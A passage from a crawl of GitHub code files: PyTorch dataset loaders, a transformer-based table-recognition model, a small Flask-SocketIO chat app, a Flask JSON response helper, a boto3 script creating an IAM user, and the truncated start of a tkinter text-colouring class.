xij\n cnt += y[ids[i, j]] * (10**j)\n Y_training[i] = cnt\n if i % 10000 == 0:\n print('i: {}/{}'.format(i, ids.shape[0]))\n\n return TensorDataset(X_training, Y_training)\n\n tr_dataset = stack_mnist(tr_dataset)\n\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n\n def plot(p, x):\n \"\"\"\n Unstack images for plotting.\n \"\"\"\n x = torch.cat((x[:, 0], x[:, 1], x[:, 2]), dim=0)[:, 
None]\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n return torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n\n return tr_dload, None, plot\n\n elif args.dataset == \"svhn\":\n if args.data_aug:\n augs = [transforms.Pad(4, padding_mode=\"reflect\"), transforms.RandomCrop(32)]\n print(\"using data augmentation\")\n else:\n augs = []\n tr_dataset = datasets.SVHN(\"./data\",\n transform=transforms.Compose(augs +\n [transforms.ToTensor()] +\n post_trans),\n download=True)\n te_dataset = datasets.SVHN(\"./data\", split='test',\n transform=transforms.Compose([transforms.ToTensor()] +\n post_trans),\n download=True)\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n return tr_dload, te_dload, plot\n\n elif args.dataset == \"cifar10\":\n if args.data_aug:\n augs = [transforms.Pad(4, padding_mode=\"reflect\"),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip()]\n print(\"using data augmentation\")\n else:\n augs = []\n tr_dataset = datasets.CIFAR10(\"./data\",\n transform=transforms.Compose(augs +\n [transforms.ToTensor()] +\n post_trans),\n download=True)\n te_dataset = datasets.CIFAR10(\"./data\", train=False,\n transform=transforms.Compose([transforms.ToTensor()] +\n post_trans),\n download=True)\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n return tr_dload, te_dload, plot\n\n elif args.dataset == \"cifar100\":\n if args.data_aug:\n augs = [transforms.Pad(4, padding_mode=\"reflect\"),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip()]\n print(\"using data augmentation\")\n else:\n augs = []\n tr_dataset = datasets.CIFAR100(\"./data\",\n transform=transforms.Compose(augs +\n [transforms.ToTensor()] +\n post_trans),\n download=True)\n te_dataset = datasets.CIFAR100(\"./data\", train=False,\n transform=transforms.Compose([transforms.ToTensor()] +\n post_trans),\n download=True)\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n return tr_dload, te_dload, plot\n\n else:\n raise NotImplementedError\n","repo_name":"wgrathwohl/VERA","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8938,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"52"} +{"seq_id":"75310849443","text":"\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom torchvision import datasets, transforms\nimport torchvision\nfrom torch.utils.data import Dataset, DataLoader\nimport os\nimport torch.nn as nn\nimport torch\nfrom torchinfo import summary\nfrom dataclasses import dataclass\nfrom torch.nn import functional as F\nfrom PIL import Image\nfrom torchvision import models\n\n\nclass ResNet_with_FPN(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.d = config.d\n self.resnet = 
models.resnet18()  # use the imported torchvision namespace; a bare resnet18 is undefined here\n        self.pyramid = []\n        self.return_nodes = {\n            'layer1.1.conv2': 'layer1', #P2\n            'layer2.1.conv2': 'layer2', #P3\n            'layer3.1.conv2': 'layer3', #P4\n            'layer4.1.conv2': 'layer4' #P5\n        }\n        # local import: create_feature_extractor is used below but missing from the header imports\n        from torchvision.models.feature_extraction import create_feature_extractor\n        self.feature_extractor = create_feature_extractor(self.resnet, return_nodes=self.return_nodes)\n        self.conv1_list = nn.ModuleList([\n            nn.Conv2d(64, 1, (1,1), 1),\n            nn.Conv2d(128, 1, (1,1), 1),\n            nn.Conv2d(256, 1, (1,1), 1),\n            nn.Conv2d(512, 1, (1,1), 1),\n        ])\n        self.conv3_list = nn.ModuleList([nn.Conv2d(1, self.d, (3,3), 2) for _ in range(4)])\n    \n    def forward(self, x):\n        B, C, H, W = x.shape\n        intermediate_outputs = self.feature_extractor(x)\n        pyramid = [None] * 4  # preallocate: the loop fills indices 3..0, so an empty list would raise IndexError\n        outs = [None] * 4\n        for i in range(3, -1, -1):\n            layer_name = 'layer' + str(i + 1)  # return_nodes keys are layer1..layer4, not layer0..layer3\n            conv1 = self.conv1_list[i]\n            conv3 = self.conv3_list[i]\n            pyramid[i] = conv1(intermediate_outputs[layer_name])\n            if i<3:\n                pyramid[i] += F.interpolate(pyramid[i+1], scale_factor=(2,2))\n            outs[i] = conv3(pyramid[i])\n        return outs\n\nclass MultiAspectGCAttention(nn.Module):\n\n    def __init__(self,\n                 inplanes,\n                 ratio=0.065,\n                 headers=1,\n                 pooling_type='att',\n                 att_scale=False,\n                 fusion_type='channel_concat'):\n        super().__init__()\n        assert pooling_type in ['avg', 'att']\n\n        assert fusion_type in ['channel_add', 'channel_mul', 'channel_concat']\n        assert inplanes % headers == 0 and inplanes >= 8 # inplanes must be divided by headers evenly\n\n        self.headers = headers\n        self.inplanes = inplanes\n        self.ratio = ratio\n        self.planes = int(inplanes * ratio)\n        self.pooling_type = pooling_type\n        self.fusion_type = fusion_type\n        self.att_scale = att_scale  # was hard-coded to False, silently ignoring the constructor argument\n\n        self.single_header_inplanes = int(inplanes / headers)\n\n        if pooling_type == 'att':\n            self.conv_mask = nn.Conv2d(self.single_header_inplanes, 1, kernel_size=1)\n            self.softmax = nn.Softmax(dim=2)\n        else:\n            self.avg_pool = nn.AdaptiveAvgPool2d(1)\n\n        if fusion_type == 'channel_add':\n            self.channel_add_conv = nn.Sequential(\n                nn.Conv2d(self.inplanes, self.planes, kernel_size=1),\n                nn.LayerNorm([self.planes, 1, 1]),\n                nn.ReLU(inplace=True),\n                nn.Conv2d(self.planes, self.inplanes, kernel_size=1))\n        elif fusion_type == 'channel_concat':\n            self.channel_concat_conv = nn.Sequential(\n                nn.Conv2d(self.inplanes, self.planes, kernel_size=1),\n                nn.LayerNorm([self.planes, 1, 1]),\n                nn.ReLU(inplace=True),\n                nn.Conv2d(self.planes, self.inplanes, kernel_size=1))\n            # for concat\n            self.cat_conv = nn.Conv2d(2 * self.inplanes, self.inplanes, kernel_size=1)\n        elif fusion_type == 'channel_mul':\n            self.channel_mul_conv = nn.Sequential(\n                nn.Conv2d(self.inplanes, self.planes, kernel_size=1),\n                nn.LayerNorm([self.planes, 1, 1]),\n                nn.ReLU(inplace=True),\n                nn.Conv2d(self.planes, self.inplanes, kernel_size=1))\n\n    def spatial_pool(self, x):\n        batch, channel, height, width = x.size()\n        if self.pooling_type == 'att':\n            # [N*headers, C', H , W] C = headers * C'\n            x = x.view(batch * self.headers, self.single_header_inplanes, height, width)\n            input_x = x\n\n            # [N*headers, C', H * W] C = headers * C'\n            # input_x = input_x.view(batch, channel, height * width)\n            input_x = input_x.view(batch * self.headers, self.single_header_inplanes, height * width)\n\n            # [N*headers, 1, C', H * W]\n            input_x = input_x.unsqueeze(1)\n            # [N*headers, 1, H, W]\n            context_mask = self.conv_mask(x)\n            # [N*headers, 1, H * W]\n            context_mask = context_mask.view(batch * self.headers, 1, height * width)\n\n            # scale variance\n            if self.att_scale and self.headers > 1:\n                context_mask = context_mask / torch.sqrt(torch.tensor(self.single_header_inplanes))\n\n            # [N*headers, 1, H * W]\n            context_mask = 
self.softmax(context_mask)\n\n # [N*headers, 1, H * W, 1]\n context_mask = context_mask.unsqueeze(-1)\n # [N*headers, 1, C', 1] = [N*headers, 1, C', H * W] * [N*headers, 1, H * W, 1]\n context = torch.matmul(input_x, context_mask)\n\n # [N, headers * C', 1, 1]\n context = context.view(batch, self.headers * self.single_header_inplanes, 1, 1)\n else:\n # [N, C, 1, 1]\n context = self.avg_pool(x)\n\n return context\n\n def forward(self, x):\n # [N, C, 1, 1]\n context = self.spatial_pool(x)\n\n out = x\n\n if self.fusion_type == 'channel_mul':\n # [N, C, 1, 1]\n channel_mul_term = torch.sigmoid(self.channel_mul_conv(context))\n out = out * channel_mul_term\n elif self.fusion_type == 'channel_add':\n # [N, C, 1, 1]\n channel_add_term = self.channel_add_conv(context)\n out = out + channel_add_term\n else:\n # [N, C, 1, 1]\n channel_concat_term = self.channel_concat_conv(context)\n\n # use concat\n _, C1, _, _ = channel_concat_term.shape\n N, C2, H, W = out.shape\n\n out = torch.cat([out, channel_concat_term.expand(-1, -1, H, W)], dim=1)\n out = self.cat_conv(out)\n out = nn.functional.layer_norm(out, [self.inplanes, H, W])\n out = nn.functional.relu(out)\n\n return out\n\ndef conv3x3(in_planes, out_planes, stride=1):\n # \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, use_gcb=False, gcb_config=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes, momentum=0.9)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes, momentum=0.9)\n self.downsample = downsample\n self.stride = stride\n self.use_gcb = use_gcb\n\n if self.use_gcb:\n gcb_ratio = gcb_config['ratio']\n gcb_headers = gcb_config['headers']\n att_scale = gcb_config['att_scale']\n fusion_type = gcb_config['fusion_type']\n self.context_block = MultiAspectGCAttention(inplanes=planes,\n ratio=gcb_ratio,\n headers=gcb_headers,\n att_scale=att_scale,\n fusion_type=fusion_type)\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.use_gcb:\n out = self.context_block(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out = out + residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = conv1x1(inplanes, planes)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = conv3x3(planes, planes, stride)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = conv1x1(planes, planes * self.expansion)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out = out + identity\n out = self.relu(out)\n\n 
return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, zero_init_residual=False, gcb=None, in_channels=1):\n super(ResNet, self).__init__()\n gcb_config = gcb\n\n self.inplanes = 64\n self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(32)\n self.relu1 = nn.ReLU(inplace=True)\n\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(64)\n self.relu2 = nn.ReLU(inplace=True)\n\n self.maxpool1 = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.layer1 = self._make_layer(block, 128, layers[0], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][0])\n\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn3 = nn.BatchNorm2d(128)\n self.relu3 = nn.ReLU(inplace=True)\n\n self.maxpool2 = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.layer2 = self._make_layer(block, 128, layers[1], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][1])\n\n self.conv4 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn4 = nn.BatchNorm2d(128)\n self.relu4 = nn.ReLU(inplace=True)\n\n self.maxpool3 = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))\n\n self.layer3 = self._make_layer(block, 256, layers[2], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][2])\n\n self.conv5 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn5 = nn.BatchNorm2d(256)\n self.relu5 = nn.ReLU(inplace=True)\n\n self.layer4 = self._make_layer(block, 256, layers[3], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][3])\n\n self.conv6 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn6 = nn.BatchNorm2d(256)\n self.relu6 = nn.ReLU(inplace=True)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1, use_gcb=False, gcb_config=None):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, use_gcb=use_gcb, gcb_config=gcb_config))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu1(x)\n\n x = self.conv2(x)\n x = self.bn2(x)\n x = self.relu2(x)\n x = self.maxpool1(x)\n x = self.layer1(x)\n\n x = self.conv3(x)\n x = self.bn3(x)\n x = self.relu3(x)\n x = self.maxpool2(x)\n x = self.layer2(x)\n\n x = self.conv4(x)\n x = self.bn4(x)\n x = self.relu4(x)\n x = self.maxpool3(x)\n x = self.layer3(x)\n\n x = self.conv5(x)\n x = self.bn5(x)\n x = self.relu5(x)\n\n x = self.layer4(x)\n\n x = self.conv6(x)\n x = self.bn6(x)\n x = self.relu6(x)\n return x\n\n\ndef resnet50(gcb_kwargs, in_channels=1):\n model = ResNet(BasicBlock, [1, 2, 5, 3], gcb=gcb_kwargs, in_channels=in_channels)\n return model\n\n\nclass 
ConvEmbeddingGC(nn.Module):\n\n    def __init__(self, in_channels=3):\n        super().__init__()\n        gcb_kwargs = {\n            \"ratio\": 0.0625,\n            \"headers\": 8,\n            \"att_scale\": True,\n            \"fusion_type\": \"channel_concat\",\n            \"layers\":[False, True, True, True]\n        }\n        self.backbone = resnet50(gcb_kwargs, in_channels=in_channels)\n\n    def forward(self, x):\n        feature = self.backbone(x)\n        b, c, h, w = feature.shape # (B, C, H/8, W/4)\n        feature = feature.view(b, c, h * w)\n        feature = feature.permute((0, 2, 1))\n        return feature\n\nimport math  # used by the positional encoding and attention scaling below; missing from the header imports\n\nclass PositionalEncoding(nn.Module):\n    def __init__(self, config):\n        super().__init__()\n        self.dropout = nn.Dropout(p=config.pe_dropout)\n\n        position = torch.arange(config.pe_maxlen).unsqueeze(1)\n        div_term = torch.exp(torch.arange(0, config.n_embd, 2) * (-math.log(10000.0) / config.n_embd))\n        self.pe = torch.zeros(config.pe_maxlen, 1, config.n_embd)\n        self.pe[:, 0, 0::2] = torch.sin(position * div_term)\n        self.pe[:, 0, 1::2] = torch.cos(position * div_term)\n\n    def forward(self, x):\n        \"\"\"\n        Arguments:\n            x: Tensor, shape ``[batch_size, seq_len, embedding_dim]``\n        \"\"\"\n        x = x + self.pe[:x.size(1)].transpose(0,1)\n        return self.dropout(x)\n\nclass CrossAttention(nn.Module):\n    def __init__(self, config):\n        super().__init__()\n        self.n_embd = config.n_embd\n        self.n_heads = config.n_heads\n        self.c_attn_q = nn.Linear(self.n_embd, self.n_embd, bias=config.bias) # q * Wq\n        self.c_attn_kv = nn.Linear(self.n_embd, self.n_embd*2, bias=config.bias)# k,v * Wk,\n        self.c_proj = nn.Linear(self.n_embd, self.n_embd, bias=config.bias)\n        # self.mask = torch.tril(torch.ones((self.block_size, self.block_size))).view(1, 1, self.block_size, self.block_size)\n        self.attn_dropout = nn.Dropout(config.dropout)\n        self.resid_dropout = nn.Dropout(config.dropout)\n\n\n    def forward(self, x, encoder_output):\n        if x.shape[0] != encoder_output.shape[0]:\n            print(\"CrossAttention: batch size mismatch between queries and encoder output\")\n            return\n        assert x.shape[0] == encoder_output.shape[0]\n        B, T, C = encoder_output.shape # batch_size, block_size, n_embd\n        B, N, C = x.shape # batch_size, n_queries, n_embd\n\n        k, v = self.c_attn_kv(encoder_output).split(self.n_embd, dim=2)\n        q = self.c_attn_q(x)\n\n        q = q.view(B, N, self.n_heads, C//self.n_heads).transpose(1,2) # (B, n_heads, N, h_size)\n        k = k.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2) # (B, n_heads, T, h_size)\n        v = v.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2) # (B, n_heads, T, h_size)\n\n        att = q@k.transpose(-2,-1)*(1/math.sqrt(k.size(-1))) # (B, n_heads, N, T)\n        att = F.softmax(att, dim=-1) # (B, n_heads, N, T)\n        att = self.attn_dropout(att)\n        y = att@v # (B, n_heads, N, h_size)\n        y = y.transpose(1,2).contiguous().view(B,N,C) #(B, N, n_heads*h_size)\n        y = self.resid_dropout(self.c_proj(y))\n        return y\n    \nclass SelfAttention(nn.Module):\n    def __init__(self, config, masked=False, inp=\"tag\"):\n        super().__init__()\n        self.n_embd = config.n_embd\n        self.n_heads = config.n_heads\n        if inp == \"tag\":\n            self.block_size = config.tags_maxlen\n        else:\n            self.block_size = config.content_maxlen\n        self.c_attn = nn.Linear(self.n_embd, self.n_embd*3, bias=config.bias)\n        self.c_proj = nn.Linear(self.n_embd, self.n_embd, bias=config.bias)\n        self.mask = torch.tril(torch.ones((self.block_size, self.block_size))).view(1, 1, self.block_size, self.block_size)\n        self.attn_dropout = nn.Dropout(config.dropout)\n        self.resid_dropout = nn.Dropout(config.dropout)\n        self.masked = masked\n\n\n    def forward(self, x):\n        B, T, C = x.shape #batch_size, block_size, n_embd\n        q, k, v = self.c_attn(x).split(self.n_embd, dim=2)\n\n        q = 
q.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2) # (B, n_heads, T, h_size)\n k = k.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2)\n v = v.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2)\n\n att = q@k.transpose(-2,-1)*(1/math.sqrt(k.size(-1))) # (B, n_heads, T, T)\n if self.masked:\n att = att.masked_fill_(self.mask[:, :, :T, :T] == 0, -float('inf'))\n\n att = F.softmax(att, dim=-1)\n att = self.attn_dropout(att)\n y = att@v #(B, n_heads, T, h_size)\n y = y.transpose(1,2).contiguous().view(B,T,C)\n y = self.resid_dropout(self.c_proj(y))\n return y\n\nclass MLP(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.c_fc = nn.Linear(config.n_embd, 4 * config.n_embd, bias=config.bias)\n self.gelu = nn.GELU()\n self.c_proj = nn.Linear(4 * config.n_embd, config.n_embd, bias=config.bias)\n self.dropout = nn.Dropout(config.dropout)\n\n def forward(self, x):\n x = self.c_fc(x)\n x = self.gelu(x)\n x = self.c_proj(x)\n x = self.dropout(x)\n return x\n \nclass DecoderBlock(nn.Module):\n def __init__(self, config, masked=True, inp=\"tag\"):\n super().__init__()\n self.self_attention = SelfAttention(config, masked, inp)\n self.ln_1 = nn.LayerNorm(config.n_embd)\n self.cross_attention = CrossAttention(config)\n self.ln_2 = nn.LayerNorm(config.n_embd)\n self.mlp = MLP(config)\n self.ln_3 = nn.LayerNorm(config.n_embd)\n def forward(self, prev_output, encoder_output):\n x = self.self_attention(prev_output)\n x = self.ln_1(x)\n x = x + self.cross_attention(x, encoder_output)\n x = self.ln_2(x)\n x = x + self.mlp(x)\n x = self.ln_3(x)\n return x\n\nclass EncoderBlock(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.backbone = models.resnet34(pretrained=True)\n self.backbone = nn.Sequential(*list(self.backbone.children())[:-3])\n self.pe = PositionalEncoding(config)\n\n def forward(self, x):\n x = self.backbone(x) #(B, n_emb, H, H)\n x = x.flatten(start_dim=2) #(B, n_emb, H*H)\n x = x.transpose(1,2) #(B, H*H, n_emb)\n outs = self.pe(x) #(B, H*H, n_emb)\n return outs\n \nclass SharedDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.emb = nn.Embedding(config.tags_vocab_size, config.n_embd)\n self.pe = PositionalEncoding(config)\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=True, inp=\"tag\")] + \\\n [DecoderBlock(config, masked=False, inp=\"tag\")]*(config.n_decoder_blocks - 1))\n\n def forward(self, x, encoder_output):\n x = x.to(torch.int64)\n x = self.emb(x) # B, tags_maxlen, n_emb\n x = self.pe(x)\n for layer in self.decoders:\n x = layer(x, encoder_output)\n return x\n \nclass StructureDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=False)]*config.n_decoder_blocks)\n self.fc_out = nn.Linear(config.n_embd, config.tags_vocab_size)\n self.dropout = nn.Dropout(config.dropout)\n\n def forward(self, x, encoder_output):\n for layer in self.decoders:\n x = layer(x, encoder_output)\n x = self.fc_out(x)\n x = self.dropout(x)\n return x\n \nclass BBoxDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=False)]*config.n_decoder_blocks)\n self.fc_out = nn.Linear(config.n_embd, 4)\n self.dropout = nn.Dropout(config.dropout)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x, encoder_output):\n for layer in self.decoders:\n x = layer(x, encoder_output)\n x = self.fc_out(x)\n x = self.dropout(x)\n outs = self.sigmoid(x)\n return outs\n\nclass 
ContentDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.n_embd = config.n_embd\n self.emb = nn.Embedding(config.content_vocab_size, self.n_embd)\n self.pe = PositionalEncoding(config)\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=True, inp=\"content\")] + \\\n [DecoderBlock(config, masked=False)]*(config.n_decoder_blocks - 1))\n self.fc_out = nn.Linear(config.n_embd, config.content_vocab_size)\n self.dropout = nn.Dropout(config.dropout)\n\n def forward(self, x, encoder_output, decoder_output):\n B, tags_maxlen, content_maxlen = x.shape # B, tags_maxlen, content_maxlen\n x = x.reshape(B*tags_maxlen, content_maxlen) # B*tags_maxlen, content_maxlen\n x = x.to(torch.int64)\n x = self.emb(x).float() # B*tags_maxlen, content_maxlen, n_emb\n x = self.pe(x)\n x += decoder_output.unsqueeze(2).repeat(1,1,content_maxlen,1).view(B*tags_maxlen, content_maxlen, self.n_embd)\n encoder_output = encoder_output.unsqueeze(1).repeat(1,tags_maxlen,1,1).view(B*tags_maxlen, encoder_output.shape[1], self.n_embd)\n\n for layer in self.decoders:\n x = layer(x, encoder_output)\n\n x = self.fc_out(x)\n x = self.dropout(x)\n\n return x.view(B, content_maxlen, tags_maxlen, x.shape[-1]).transpose(1,2)\n","repo_name":"nguyenhoanganh2002/Table-Recognition-base-on-Transformer-Decoder","sub_path":"sub_modules.py","file_name":"sub_modules.py","file_ext":"py","file_size_in_byte":23416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17078639132","text":"import os\n\nfrom flask import Flask, session, request, render_template, redirect, jsonify\nfrom flask_session import Session\nfrom flask_socketio import SocketIO, emit\nimport datetime\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\nchannel_list = []\nuser_list = []\nchannel_messages = {}\n\n@app.route(\"/logout\")\ndef logout():\n session.clear()\n return redirect(\"/\")\n\n@socketio.on(\"send message\")\ndef mess(data):\n tstamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M')\n message = data[\"message\"]\n user = data[\"user\"]\n # Make dictionary(for now only message content, then add user id)\n message_dict = {\"content\": message, \"user\": user, \"timestamp\": tstamp}\n channel = data[\"channel\"]\n # add message (and drop one message if more than 100):\n if len(channel_messages[channel]) > 100:\n del channel_messages[channel][0]\n channel_messages[channel].append(message_dict)\n emit(\"receive message\", {\"message\": message, \"user\": user, \"timestamp\": tstamp}, broadcast=True)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n\n if session.get(\"user_id\") is not None and session.get(\"channel\") is not None:\n chanName = session.get(\"channel\")\n return redirect(f\"/channel/{chanName}\")\n\n # delete channel in session if exists\n session.pop(\"channel\", None)\n\n if request.method == 'GET':\n if session.get(\"user_id\") is not None:\n return render_template(\"welcome.html\", uname = session['user_id'], channels = channel_list)\n return render_template(\"index.html\", channels = channel_list)\n\n if request.method == 'POST':\n # Add something to prevent sending an empty name\n name = request.form.get(\"uname\")\n session['user_id'] = name\n user_list.append(name)\n return render_template(\"welcome.html\", uname = name, channels = 
channel_list)\n\n@app.route('/handle_channel', methods=['POST'])\ndef handle_channel():\n    chanName = request.form.get(\"channame\")\n    channel_list.append(chanName)\n    channel_messages[chanName] = []\n    return redirect(f\"/channel/{chanName}\")\n\n@app.route(\"/channel/<channame>\")\ndef channelContent(channame):\n    if session.get(\"user_id\") is None:\n        return redirect(\"/\")\n\n    # set channel name\n    session['channel'] = channame\n\n    return render_template(\"channel.html\", channel = channame, channels = channel_list,\n     messages = channel_messages[channame])\n\n@app.route(\"/message_list\", methods=[\"POST\"])\ndef message_list():\n\n    # Channel we need message list for\n    channel = request.form.get(\"channel\")\n    return jsonify({\"messages\": channel_messages[channel]})\n    #return jsonify({\"messages\": \"hello\"})\n","repo_name":"lrnzfontana/CS50_WebPr_P2","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35356546133","text":"from flask import jsonify, request\n\n\nclass Response:\n    @classmethod\n    def success(cls, status, data, status_code=200, message=None):\n        response_dict = {\n            'status': status,\n            'data': data,\n            'request_id': request.environ.get('HTTP_X_REQUEST_ID', 'NA')\n        }\n        if message:\n            response_dict['message'] = message\n        return jsonify(response_dict), status_code\n\n    @classmethod\n    def error(cls, error_code, message, status_code=500):\n        response_dict = {\n            'status': 'error',\n            'error': message,\n            'error_code': error_code,\n            'request_id': request.environ.get('HTTP_X_REQUEST_ID', 'NA')\n        }\n        return jsonify(response_dict), status_code\n","repo_name":"akshayanagaraj/askanyone-backend","sub_path":"service/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7962689034","text":"import boto3 #for connecting to aws\n\nclient = boto3.client('iam') #which service do we want to communicate with\n\n#if we want to create many things in a file e.g. ec2 with iam, we rename our variable to \n# iam_client = client = boto3.client('iam')\n#print(dir(client)) #to see the actions we can do with iam using boto3 client\nresponse = client.create_user( #what do we want to do with iam (create)... 
response can be anything\n    UserName=\"bako_python\"\n)\n\nprint(response)\n","repo_name":"tisanbako/python-project","sub_path":"Tisan-AWS-Automation/1c-creat_iam_user.py","file_name":"1c-creat_iam_user.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24385873484","text":"from threading import Thread\nfrom tkinter import END\nfrom copy import deepcopy\nfrom re import finditer\nfrom re import search\nfrom time import time\n\n\nclass Colorir():\n    def __init__(self, master, dic_comandos): \n        self.__tx_editor_codigo = None\n        self.__historico_coloracao = []\n        self.__lista_todos_coloracao = []\n\n        self.master = master\n        self.dic_comandos = dic_comandos\n        self.cor_do_comando = None\n\n    def alterar_cor_comando(self, novo_cor_do_comando):\n        self.cor_do_comando = novo_cor_do_comando\n\n    def __realiza_coloracao(self, palavra, linha, valor1, valor2, cor):\n        linha1 = '{}.{}'.format(linha, valor1)\n        linha2 = '{}.{}'.format(linha, valor2)\n\n        self.__tx_editor_codigo.tag_add(palavra, linha1, linha2)\n        self.__tx_editor_codigo.tag_config(palavra, foreground=cor)\n\n    def __marcar_coloracao(self, 